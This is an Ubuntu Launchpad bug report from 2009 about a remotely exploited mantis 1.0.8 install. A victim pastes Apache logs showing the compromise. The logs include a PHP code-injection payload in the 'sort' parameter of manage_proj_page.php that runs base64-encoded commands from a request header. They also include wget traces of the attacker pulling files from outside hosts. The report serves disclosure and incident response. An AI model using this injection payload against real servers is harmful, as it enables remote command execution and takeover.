Ubuntu
mantis package

mantis1.0.8-4 (ubuntu 8.04) vulnerable to remote exploit

Bug #481631 reported by Markus Gonaus on 2009-11-12

286

This bug affects 1 person

	Status	Importance	Assigned to
mantis	Fix Released	Unknown	mantis-bt #9704
mantis (Ubuntu)	Fix Released	High	Unassigned
Hardy	Fix Released	High	Unassigned
Intrepid	Invalid	Undecided	Unassigned

Bug Description

Binary package hint: mantis

My system has been taken over.
It looks like it is a vulnerability allready reportet a year ago.

it seems like the following log lines indicate the reason how a file got deployed in /tmp

206.217.198.78 - - [09/Nov/2009:23:25:53 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3336 "-" "-"
206.217.198.78 - - [09/Nov/2009:23:25:57 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3295 "-" "-"
206.217.198.78 - - [09/Nov/2009:23:26:17 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23

<code>
error.log
[Mon Nov 09 23:25:05 2009] [error] [client 206.183.9.211] File does
not exist: /var/www/favicon.ico
--23:26:18-- http://g0lias.tripod.com/dc.txt
=> `dc.txt'
Resolving g0lias.tripod.com... 209.202.252.50
Connecting to g0lias.tripod.com|209.202.252.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 759 [text/plain]

0K 100%
56.32 MB/s

23:26:19 (56.32 MB/s) - `dc.txt' saved [759/759]

[Mon Nov 09 23:42:55 2009] [error] [client 194.109.21.230] File does
not exist: /var/www/proxycheck.txt
[Mon Nov 09 23:43:28 2009] [error] [client 193.109.122.17] request
failed: error reading the headers
--00:05:46-- http://lordmax.host.sk/ddos.jpg
=> `ddos.jpg'
Resolving lordmax.host.sk... 62.168.109.150
Connecting to lordmax.host.sk|62.168.109.150|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 204,429 (200K) [image/jpeg]

    0K .......... .......... .......... .......... .......... 25%
1.06 MB/s
   50K .......... .......... .......... .......... .......... 50%
3.02 MB/s
  100K .......... .......... .......... .......... .......... 75%
3.29 MB/s
  150K .......... .......... .......... .......... ......... 100%
3.39 MB/s

00:05:47 (2.13 MB/s) - `ddos.jpg' saved [204429/204429]

./start.sh: 1: /#bin/bash: not found
[Tue Nov 10 00:06:43 2009] [error] [client 194.109.21.230] File does
not exist: /var/www/proxycheck.txt
[Tue Nov 10 00:08:06 2009] [error] [client 212.174.153.69] client
sent HTTP/1.1 request without hostname (see RFC2616 section 14.23):
/w00tw00t.at.ISC.SANS.DFind:)
[Tue Nov 10 00:09:19 2009] [error] [client 194.109.21.230] File does
not exist: /var/www/proxycheck.txt

access.log
127.0.0.1 - - [09/Nov/2009:23:19:32 +0100] "OPTIONS * HTTP/1.0" 200 -
"-" "Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
(internal dummy connection)"
96.57.77.197 - - [09/Nov/2009:23:19:47 +0100] "GET
/w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 353 "-" "-"
206.183.9.211 - - [09/Nov/2009:23:24:48 +0100] "GET
/mantis/verify.php?id=6&confirm_hash=afce2470012023a8b8cb603c16afd8c9
HTTP/1.1" 200 5689
"http://us.mg4.mail.yahoo.com/dc/blank.html?bn=211.6&.intl=us&.lang=en-US"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:24:52 +0100] "GET
/mantis/css/default.css HTTP/1.1" 200 5120
"http://85.25.20.217/mantis/verify.php?id=6&confirm_hash=afce2470012023a8b8cb603c16afd8c9"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:24:53 +0100] "GET
/mantis/javascript/common.js HTTP/1.1" 200 3186
"http://85.25.20.217/mantis/verify.php?id=6&confirm_hash=afce2470012023a8b8cb603c16afd8c9"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:25:00 +0100] "GET
/mantis/images/mantis_logo_button.gif HTTP/1.1" 200 2413
"http://85.25.20.217/mantis/verify.php?id=6&confirm_hash=afce2470012023a8b8cb603c16afd8c9"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:25:00 +0100] "GET
/mantis/images/mantis_logo.gif HTTP/1.1" 200 5202
"http://85.25.20.217/mantis/verify.php?id=6&confirm_hash=afce2470012023a8b8cb603c16afd8c9"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:25:02 +0100] "GET /favicon.ico
HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:25:05 +0100] "GET /favicon.ico
HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:25:42 +0100] "POST
/mantis/account_update.php HTTP/1.1" 200 3482
"http://85.25.20.217/mantis/verify.php?id=6&confirm_hash=afce2470012023a8b8cb603c16afd8c9"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:25:45 +0100] "GET
/mantis/account_page.php HTTP/1.1" 200 5323 "-" "Mozilla/5.0
(Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102
(CK-Finbu.com) Firefox/3.5.5"
206.217.198.78 - - [09/Nov/2009:23:25:52 +0100] "GET
/mantis/manage_proj_page.php HTTP/1.0" 200 3825 "-" "-"
206.217.198.78 - - [09/Nov/2009:23:25:53 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3336 "-" "-"
206.217.198.78 - - [09/Nov/2009:23:25:57 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3295 "-" "-"
206.217.198.78 - - [09/Nov/2009:23:26:17 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3302 "-" "-"
206.183.9.211 - - [09/Nov/2009:23:37:14 +0100] "GET
/mantis/account_page.php HTTP/1.1" 200 5323 "-" "Mozilla/5.0
(Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102
(CK-Finbu.com) Firefox/3.5.5"
127.0.0.1 - - [09/Nov/2009:23:39:16 +0100] "OPTIONS * HTTP/1.0" 200 -
"-" "Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
(internal dummy connection)"
127.0.0.1 - - [09/Nov/2009:23:40:28 +0100] "OPTIONS * HTTP/1.0" 200 -
"-" "Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
(internal dummy connection)"
194.109.21.230 - - [09/Nov/2009:23:42:55 +0100] "CONNECT
194.109.153.5:11111 HTTP/1.0" 302 348 "-" "-"
194.109.21.230 - - [09/Nov/2009:23:42:55 +0100] "GET
http://194.109.153.3/proxycheck.txt HTTP/1.0" 404 330 "-"
"BOPM/3.1.3"
194.109.21.230 - - [09/Nov/2009:23:42:56 +0100] "POST
http://194.109.153.5:11111/ HTTP/1.0" 302 348 "-" "-"
193.109.122.38 - - [09/Nov/2009:23:43:10 +0100] "CONNECT
72.51.18.254:6677 HTTP/1.0" 302 344 "-" "pxyscand/2.1"
193.109.122.17 - - [09/Nov/2009:23:42:58 +0100] "GET
http://72.51.18.254:6677 HTTP/1.0" 400 345 "-" "-"

</code>

Related branches

lp:ubuntu/hardy-security/mantis